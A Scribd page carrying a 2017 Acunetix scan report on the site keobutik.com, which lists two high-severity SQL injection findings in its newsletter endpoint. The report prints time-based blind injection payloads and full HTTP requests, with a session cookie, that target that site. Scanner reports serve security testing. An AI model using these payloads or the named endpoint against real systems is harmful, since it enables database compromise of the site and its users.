Selamat datang di Scribd!

Lewati carousel

Affected Items

Diunggah oleh

Anonymous 9QZfmX3y

0% menganggap dokumen ini bermanfaat (0 suara)

64 tayangan5 halaman

KEO AİLESİ <3

Judul Asli

Affected Items (1)

Hak Cipta

Format Tersedia

PDF, TXT atau baca online dari Scribd

Bagikan dokumen Ini

Bagikan atau Tanam Dokumen

Opsi Berbagi

Apakah menurut Anda dokumen ini bermanfaat?

Apakah konten ini tidak pantas?

Laporkan Dokumen Ini

KEO AİLESİ <3

Hak Cipta:

Format Tersedia

Unduh sebagai PDF, TXT atau baca online dari Scribd

Tandai sebagai konten tidak pantas

0% menganggap dokumen ini bermanfaat (0 suara)

64 tayangan5 halaman

Affected Items

Diunggah oleh

Anonymous 9QZfmX3y

KEO AİLESİ <3

Hak Cipta:

Format Tersedia

Unduh sebagai PDF, TXT atau baca online dari Scribd

Tandai sebagai konten tidak pantas

Lompat ke Halaman

Anda di halaman 1dari 5

Cari di dalam dokumen

Affected Items

Report
Acunetix website audit

12 September 2017

WEB APPLICATION SECURITY

Generated by Acunetix Reporter
Selected vulnerabilities
Scan details
Scan information
Start url http://keobutik.com/
Host http://keobutik.com/

Threat level

Acunetix Threat Level 3

One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these
vulnerabilities and compromise the backend database and/or deface your website.

Alerts distribution

Total alerts found 2

High 2
Medium 0
Low 0
Informational 0
Affected items
/index.php
Alert group Blind SQL Injection
Severity High
This script is possibly vulnerable to SQL Injection attacks.

SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by
manipulating the user input. An SQL injection occurs when web applications accept user input
Description that is directly placed into a SQL statement and doesn't properly filter out dangerous characters.

This is one of the most common application layer attacks currently being used on the Internet.
Despite the fact that it is relatively easy to protect against, there is a large number of web
applications vulnerable.
Your script should filter metacharacters from user input.
Recommendations
Check detailed information for more information about fixing this vulnerability.
Alert variants
URL encoded POST input email was set to
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysd
ate(),sleep(0),0))OR"*/

Tests performed:

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysd
ate(),sleep(9),0))OR"*/ => 18.172
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysd
ate(),sleep(3),0))OR"*/ => 6.234
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysd
ate(),sleep(0),0))OR"*/ => 0.672
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysd
ate(),sleep(6),0))OR"*/ => 12.093
Details
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysd
ate(),sleep(0),0))OR"*/ => 0.219
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysd
ate(),sleep(0),0))OR"*/ => 0.141
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysd
ate(),sleep(0),0))OR"*/ => 0.235
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysd
ate(),sleep(6),0))OR"*/ => 12.062
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysd
ate(),sleep(0),0))OR"*/ => 0.422

Original value: sample@email.tst

POST /index.php?route=module/newsletters/news HTTP/1.1
Content-Length: 128
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://keobutik.com/
Cookie: PHPSESSID=a7390b1df70d9afffc028fbd8d4face7; language=tr-tr; currency=TRY
Host: keobutik.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
email=
(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'"%2b(select(0)
from(select(sleep(0)))v)%2b"*/

/index.php
Alert group SQL injection
Severity High
This script is possibly vulnerable to SQL Injection attacks.

Details Error message found:

You have an error in your SQL syntax

POST /index.php?route=module/newsletters/news HTTP/1.1

Content-Length: 9
Content-Type: application/x-www-form-urlencoded
Referer: http://keobutik.com/
Cookie: PHPSESSID=a7390b1df70d9afffc028fbd8d4face7; language=tr-tr; currency=TRY
Host: keobutik.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
email=1'"
Scanned items (coverage report)
http://keobutik.com/index.php

Anda mungkin juga menyukai

Affected Items HTTP Plen in
Dokumen26 halaman
Affected Items HTTP Plen in
Anjura Begum
Belum ada peringkat
JSP Vulnerabilities and Fixes Guide
Dokumen6 halaman
JSP Vulnerabilities and Fixes Guide
abhijitch
Belum ada peringkat
Devouring Security: Marudhamaran Gunasekaran Dot Net Bangalore 3 Meet Up May 16 2015 at Prowareness, Bangalore
Dokumen40 halaman
Devouring Security: Marudhamaran Gunasekaran Dot Net Bangalore 3 Meet Up May 16 2015 at Prowareness, Bangalore
ssda103
Belum ada peringkat
Developer Report PDF
Dokumen65 halaman
Developer Report PDF
Anonymous JyKPfbZBQ
Belum ada peringkat
OWASP Top Ten Proactive Controls v2
Dokumen88 halaman
OWASP Top Ten Proactive Controls v2
Sotsir Núñez
Belum ada peringkat
Synacktiv-Danfoss-Storeview-Multiple-Vulnerabilities
Dokumen6 halaman
Synacktiv-Danfoss-Storeview-Multiple-Vulnerabilities
kepakko
Belum ada peringkat
How Terraform Modules Works
Dokumen18 halaman
How Terraform Modules Works
s.devops.practice
Belum ada peringkat
Best of Oracle 2018
Dokumen80 halaman
Best of Oracle 2018
Kiran Kumar
Belum ada peringkat
Tech Talks 52 Good To The Last Drop Writing Robust Flask and Django Apps
Dokumen49 halaman
Tech Talks 52 Good To The Last Drop Writing Robust Flask and Django Apps
umayrh@gmail.com
Belum ada peringkat
BurpSuite Pro Presentation X
Dokumen34 halaman
BurpSuite Pro Presentation X
Ömer Coşkun
Belum ada peringkat
CVE-2012-2661: ActiveRecord SQL Injection
Dokumen29 halaman
CVE-2012-2661: ActiveRecord SQL Injection
Miguel Lozano
Belum ada peringkat
Spot The Web Vulnerability
Dokumen35 halaman
Spot The Web Vulnerability
Miroslav Stampar
Belum ada peringkat
Advanced SQL IntectionV3
Dokumen83 halaman
Advanced SQL IntectionV3
Joseph McCray
Belum ada peringkat
Source Email Worm - win32.Skybag.A
Dokumen58 halaman
Source Email Worm - win32.Skybag.A
etiennekraemer
Belum ada peringkat
Ns Lab
Dokumen26 halaman
Ns Lab
ankuprajapati0525
Belum ada peringkat
Exact Basics of Hacking Intro: Description
Dokumen6 halaman
Exact Basics of Hacking Intro: Description
Street_Hacker_01
Belum ada peringkat
Developer Example
Dokumen87 halaman
Developer Example
hardiron
Belum ada peringkat
Oracle
Dokumen45 halaman
Oracle
李德军
Belum ada peringkat
Top 30 NodeJS Modules
Dokumen110 halaman
Top 30 NodeJS Modules
PERLUES
Belum ada peringkat
Sansa
Dokumen10 halaman
Sansa
nntshali17
Belum ada peringkat
Dependencias Projeto Dotnet Core
Dokumen111 halaman
Dependencias Projeto Dotnet Core
Matheus Almeida
Belum ada peringkat
Confluence CVE 50243
Dokumen2 halaman
Confluence CVE 50243
scribdfoo1
Belum ada peringkat
Setup
Dokumen19 halaman
Setup
pavithra2
Belum ada peringkat
Vaccine
Dokumen23 halaman
Vaccine
shayala
Belum ada peringkat
PHP Security and Templates
Dokumen7 halaman
PHP Security and Templates
Kartheeswari Saravanan
Belum ada peringkat
33小铺扫描附件
Dokumen9 halaman
33小铺扫描附件
ni ko
Belum ada peringkat
From Sqli To Shell II
Dokumen37 halaman
From Sqli To Shell II
danielfiguero5293
Belum ada peringkat
Padding Oracle Test
Dokumen4 halaman
Padding Oracle Test
c_unlocker
Belum ada peringkat
Uc HTTPD
Dokumen6 halaman
Uc HTTPD
Insecurity Tube
Belum ada peringkat
SSRF
Dokumen9 halaman
SSRF
Rio Rahmat
Belum ada peringkat
Bypassing ASLR & DEP-17914
Dokumen19 halaman
Bypassing ASLR & DEP-17914
Daniel Sirait
Belum ada peringkat
Website Security Report Reveals Multiple Vulnerabilities
Dokumen17 halaman
Website Security Report Reveals Multiple Vulnerabilities
anupprakash36
Belum ada peringkat
From Sqli To Shell II
Dokumen37 halaman
From Sqli To Shell II
Miguel Lozano
Belum ada peringkat
Snort Project
Dokumen12 halaman
Snort Project
Chandana Mallagundla
Belum ada peringkat
Snort Project
Dokumen12 halaman
Snort Project
Oumaima Kaoukabi
Belum ada peringkat
Zend Security, Securing PHP Applications
Dokumen34 halaman
Zend Security, Securing PHP Applications
Ram
100% (3)
Eu 19 Melamed Alexa Hack My Server Less Please PDF
Dokumen29 halaman
Eu 19 Melamed Alexa Hack My Server Less Please PDF
Sven Christian Goerz
Belum ada peringkat
Vmware Vsphere 5 Troubleshooting Lab Guide and Slides
Dokumen14 halaman
Vmware Vsphere 5 Troubleshooting Lab Guide and Slides
Amit Sharma
Belum ada peringkat
Scan Nexpose Gestor de BD Postgresql y Ubuntu Server
Dokumen32 halaman
Scan Nexpose Gestor de BD Postgresql y Ubuntu Server
Mirla Muñoz
Belum ada peringkat
XSS Filter Evasion Cheat Sheet - OWASP
Dokumen44 halaman
XSS Filter Evasion Cheat Sheet - OWASP
Sup' Tan'
Belum ada peringkat
10a - Web Security
Dokumen14 halaman
10a - Web Security
Alif Faisal
Belum ada peringkat
Lab Fat: CSE3501 Information Security Analysis and Audit
Dokumen21 halaman
Lab Fat: CSE3501 Information Security Analysis and Audit
Sona Sharma
Belum ada peringkat
1671434977811-WAF Bypass Methods Techniques
Dokumen15 halaman
1671434977811-WAF Bypass Methods Techniques
Patrick Naggar
Belum ada peringkat
Web Security Problem Set
Dokumen4 halaman
Web Security Problem Set
Anonymous 0PRCsW6
Belum ada peringkat
SNMP
Dokumen4 halaman
SNMP
johannes_palfrader
Belum ada peringkat
A Study of Android Application Security
Dokumen38 halaman
A Study of Android Application Security
Nisa Adin Salsabila
Belum ada peringkat
Website Error
Dokumen5 halaman
Website Error
José David
Belum ada peringkat
Acunetix Audit Reveals Error Messages
Dokumen7 halaman
Acunetix Audit Reveals Error Messages
Raheel
Belum ada peringkat
NoSQL Injection for Elasticsearch
Dari Everand
NoSQL Injection for Elasticsearch
Gary Drocella
Belum ada peringkat
p23cs025 Lab3
Dokumen7 halaman
p23cs025 Lab3
Nagendra Sethi
Belum ada peringkat
IDS: Detect Intrusions with Snort and Tripwire
Dokumen35 halaman
IDS: Detect Intrusions with Snort and Tripwire
Rajesh Gangarapu
Belum ada peringkat
Wvs Singles Can
Dokumen1.007 halaman
Wvs Singles Can
b1naryn1ghtmar3844
Belum ada peringkat
13. scaning and enumeration
Dokumen4 halaman
13. scaning and enumeration
Naimur Rahman
Belum ada peringkat
SP Blitz
Dokumen227 halaman
SP Blitz
Miguel
Belum ada peringkat
Web XSS Elgg
Dokumen11 halaman
Web XSS Elgg
elizabeth
Belum ada peringkat
Vivamax
Dokumen3 halaman
Vivamax
marcos
Belum ada peringkat
SQL Injection Cheat Sheet
Dokumen7 halaman
SQL Injection Cheat Sheet
Thảo Nguyễn
Belum ada peringkat
Manipulating SQL Server Using SQL Injection
Dokumen14 halaman
Manipulating SQL Server Using SQL Injection
Álvaro Augusto Fuentes Forero
Belum ada peringkat
Some Tutorials in Computer Networking Hacking
Dari Everand
Some Tutorials in Computer Networking Hacking
Dr. Hidaia Mahmood Alassouli
Belum ada peringkat
How to a Developers Guide to 4k: Developer edition, #3
Dari Everand
How to a Developers Guide to 4k: Developer edition, #3
Xinc Cyberwizard
Belum ada peringkat
Lab Cisco CCNA
Dokumen4 halaman
Lab Cisco CCNA
Juruma_
Belum ada peringkat
Policies - CCTV SOP PDF
Dokumen8 halaman
Policies - CCTV SOP PDF
Deepak P
Belum ada peringkat
Developing Test Cases From Use Cases & Requirement Specifications
Dokumen19 halaman
Developing Test Cases From Use Cases & Requirement Specifications
Olubunmi Omoniyi
Belum ada peringkat
Aes Final
Dokumen134 halaman
Aes Final
Prasanna
Belum ada peringkat
Random Pixel Selection Based Improved LSB Image Steganography Method Using 1 D Logistic Map and AES Encryption Algorithm
Dokumen4 halaman
Random Pixel Selection Based Improved LSB Image Steganography Method Using 1 D Logistic Map and AES Encryption Algorithm
International Journal of Innovative Science and Research Technology
Belum ada peringkat
E-Health Wireless IDS With SIEM Integration: April 2018
Dokumen3 halaman
E-Health Wireless IDS With SIEM Integration: April 2018
E.G
Belum ada peringkat
Google Book Search Project
Dokumen437 halaman
Google Book Search Project
John Strohl
Belum ada peringkat
GALILEO Flight Booking Entry Guide
Dokumen46 halaman
GALILEO Flight Booking Entry Guide
sireh15
Belum ada peringkat
Stock Inventory System of Fabric Warehouse
Dokumen4 halaman
Stock Inventory System of Fabric Warehouse
Radziah Zainuddin
Belum ada peringkat
Honeywell Vista 250bpt Data Sheet
Dokumen4 halaman
Honeywell Vista 250bpt Data Sheet
Alarm Grid Home Security and Alarm Monitoring
Belum ada peringkat
Ims Registration
Dokumen4 halaman
Ims Registration
tempgp
100% (1)
The Gripen Philosophy International Fighter Conference
Dokumen37 halaman
The Gripen Philosophy International Fighter Conference
Jaya Kristianto
100% (2)
Data Leak Prevention: Mydlp Enterprise Edition
Dokumen2 halaman
Data Leak Prevention: Mydlp Enterprise Edition
Felippe Coelho
Belum ada peringkat
Tripwire Training
Dokumen69 halaman
Tripwire Training
neoalt
Belum ada peringkat
RCCB
Dokumen16 halaman
RCCB
Harnoor Singh Ahluwalia
Belum ada peringkat
SAP Fundamentals
Dokumen60 halaman
SAP Fundamentals
ERP TRAININGS
100% (5)
Un3 - Wifi
Dokumen27 halaman
Un3 - Wifi
rpgiraldez
Belum ada peringkat
SB Enc System
Dokumen66 halaman
SB Enc System
christos1157
Belum ada peringkat
RTS Feature of Bluecoat
Dokumen4 halaman
RTS Feature of Bluecoat
pskroyal
Belum ada peringkat
Business Ethic Case 1 v.2.5
Dokumen17 halaman
Business Ethic Case 1 v.2.5
Dafry Reksavagita
100% (1)
Guia Compliance Officer
Dokumen7 halaman
Guia Compliance Officer
Her Huw
Belum ada peringkat
Vendor Digital Signature
Dokumen2 halaman
Vendor Digital Signature
Ibnu Syah
Belum ada peringkat
Your Electronic Ticket Receipt
Dokumen2 halaman
Your Electronic Ticket Receipt
Muh Mukhlis Ramadhan
Belum ada peringkat
AIT Report
Dokumen45 halaman
AIT Report
Jerauld Bucol
Belum ada peringkat
Network Administrator CV
Dokumen3 halaman
Network Administrator CV
Pm Elu
Belum ada peringkat
Core
Dokumen2.729 halaman
Core
Tanzeelur Rehman
Belum ada peringkat
Risk Assessment Form - Part A: Reference: Sign-Off Status Assessment Summary Details
Dokumen2 halaman
Risk Assessment Form - Part A: Reference: Sign-Off Status Assessment Summary Details
Asfaar Khan
Belum ada peringkat
Object-Oriented Programming Fundamentals in C
Dokumen9 halaman
Object-Oriented Programming Fundamentals in C
Nikita Patil
Belum ada peringkat
Biometric Finger Print Scanner For Motor Vehicle
Dokumen4 halaman
Biometric Finger Print Scanner For Motor Vehicle
Shaira
Belum ada peringkat
Access Control System
Dokumen9 halaman
Access Control System
Tim McCardle
Belum ada peringkat